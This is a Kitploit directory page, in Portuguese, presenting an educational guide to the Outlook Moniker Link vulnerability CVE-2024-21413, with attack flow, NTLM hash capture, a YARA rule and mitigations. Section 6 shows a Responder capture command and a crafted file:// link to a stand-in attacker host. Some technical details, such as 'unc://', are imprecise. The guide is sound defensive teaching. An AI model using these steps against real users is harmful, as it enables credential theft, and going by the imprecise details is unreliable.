Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Moniker-Link--CVE-2024-21413- — Guia educacional sobre CVE-2024-21413, a vulnerabilidade Outlook zero-click Moniker Link, cobrindo fluxo de ataque, captura de credenciais NTLM, detecção com YARA e estratégias de mitigação. | Kitploit
Ferramentas/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Quebra de SenhasFerramentas de PhishingAnálise de VulnerabilidadesExploraçãoEvasão de IDS/IPSMovimento LateralTestes de PenetraçãoAprendizado e EducaçãoRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Segurança de Email
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Guia educacional sobre CVE-2024-21413, a vulnerabilidade Outlook zero-click Moniker Link, cobrindo fluxo de ataque, captura de credenciais NTLM, detecção com YARA e estratégias de mitigação.

Ver Repositório
7há 4 mesesAinda não revisado

🔗 Moniker Link (CVE-2024-21413) — Um Guia Prático para a Vulnerabilidade de Zero-Clique no Outlook


📌 1. Introdução

CVE-2024-21413, comumente referida como a vulnerabilidade Moniker Link, é uma falha de segurança crítica no Microsoft Outlook que permite que atacantes vazem credenciais de usuários sem exigir qualquer interação.

Ao contrário dos ataques de phishing tradicionais, esta vulnerabilidade pode ser desencadeada simplesmente ao visualizar um e-mail, tornando-a particularmente perigosa em ambientes corporativos.

O problema decorre de como o Outlook processa links moniker, causando tentativas de autenticação não intencionais para sistemas controlados pelo atacante.


🧠 2. Conceitos Chave

Entender os seguintes conceitos é essencial:

🔹 Moniker Link

Um mecanismo específico do Windows que permite que aplicativos referenciem recursos externos usando protocolos como:

  • file://
  • unc://

🔹 Autenticação NTLM

  • Um protocolo de autenticação legado do Windows
  • Envia automaticamente credenciais com hash ao acessar recursos remotos
  • Suscetível a ataques de captura e retransmissão de credenciais

🔹 Caminho UNC (Convenção de Nomenclatura Universal)

root@kitploit:~
\\servidor-atacante\compartilhamento

Usado para acessar recursos compartilhados em uma rede. Nesta vulnerabilidade, é abusado para forçar solicitações de autenticação.

🔹 Bypass da Exibição Protegida

A Exibição Protegida do Outlook foi projetada para isolar conteúdo potencialmente inseguro. Esta vulnerabilidade contorna essa proteção, permitindo o acesso a recursos externos.


⚙️ 3. Como Funciona

Fluxo do Ataque (Passo a Passo)

  1. Criação do Payload

    • Atacante incorpora um link moniker malicioso (ex.: file://servidor-atacante/compartilhamento) dentro de um e-mail.
  2. Entrega

    • O e-mail é enviado para a vítima.
  3. Acionamento

    • A vítima visualiza ou abre o e-mail no Outlook.
  4. Processamento Automático

    • O Outlook processa o link sem interação do usuário.
  5. Solicitação de Autenticação

    • O Windows tenta autenticação NTLM para o servidor do atacante.
  6. Exposição de Credenciais

    • O atacante captura o hash NTLM.

Diagrama do Fluxo do Ataque

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. Impacto no Mundo Real

Cenários Comuns de Ataque

  • Campanhas de phishing direcionadas contra organizações
  • Coleta de credenciais em redes corporativas
  • Acesso inicial para movimento lateral

Objetivos do Atacante

  • Capturar hashes NTLM
  • Retransmitir autenticação para serviços internos
  • Escalar privilégios dentro da rede

🛠️ 5. Ferramentas e Tecnologias

Ferramentas Ofensivas / de Pesquisa

  • Responder — Captura hashes de autenticação NTLM
  • Impacket — Kit de ferramentas de exploração de rede
  • ntlmrelayx.py — Realiza ataques de retransmissão NTLM

Ferramentas Defensivas

  • Microsoft Defender — Detecção e resposta de endpoint
  • Wireshark — Inspeção de tráfego de rede
  • Sysmon — Registro avançado de eventos do sistema

💻 6. Exemplo Prático (Apenas em Ambiente de Laboratório)

⚠️ Realize apenas em ambientes de laboratório controlados

Iniciar Serviço de Captura NTLM

root@kitploit:~
sudo responder -I eth0

Exemplo de Link Malicioso

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

Saída Esperada

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Detecção (Regra YARA)

Uma regra de detecção foi desenvolvida por Florian Roth para identificar tentativas de exploração envolvendo links moniker.

Exemplo de Regra YARA

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Casos de Uso de Detecção

  • Varredura de gateway de e-mail
  • Geração de alertas SIEM
  • Caça a ameaças para links suspeitos

🛡️ 8. Mitigação e Melhores Práticas

Gerenciamento de Patches

  • Aplique imediatamente as atualizações de segurança fornecidas pela Microsoft

Fortalecimento da Autenticação

  • Desative o NTLM quando possível
  • Force a autenticação Kerberos

Controles de Rede

  • Bloqueie SMB de saída (TCP 445) para redes externas
  • Restrinja conexões de saída desnecessárias

Segurança de E-mail

  • Filtre ou sanitize links file:// e baseados em UNC
  • Use soluções avançadas de proteção contra ameaças de e-mail

Monitoramento e Detecção

  • Monitore tentativas de autenticação de saída
  • Registre e alerte sobre tráfego SMB incomum

⚠️ 9. Erros Comuns

  • Assumir que a interação do usuário é necessária
  • Ignorar riscos relacionados ao NTLM em ambientes modernos
  • Confiar apenas no antivírus sem controles de rede
  • Atrasar a implantação de patches

🧾 10. Conclusão

CVE-2024-21413 demonstra como comportamentos do sistema profundamente integrados (como autenticação automática) podem ser explorados através de entradas aparentemente inofensivas, como links de e-mail.

Principais Conclusões

  • Vulnerabilidade de zero-clique — nenhuma interação do usuário necessária
  • Explora o tratamento de links moniker pelo Outlook
  • Resulta em vazamento de credenciais NTLM
  • Detectável usando YARA e monitoramento de rede
  • Prevenível através de patches e configuração adequada

📚 11. Leitura Adicional

  • Microsoft Security Advisory — CVE-2024-21413
  • Impacket Documentation (NTLM Relay Attacks)
  • YARA Documentation
  • OWASP Authentication Cheat Sheet

💡 Recomendação: Reproduza esta vulnerabilidade em um laboratório virtual (ex.: VM Windows + VM atacante) para entender completamente a cadeia de ataque e as estratégias defensivas.

Baixar ferramenta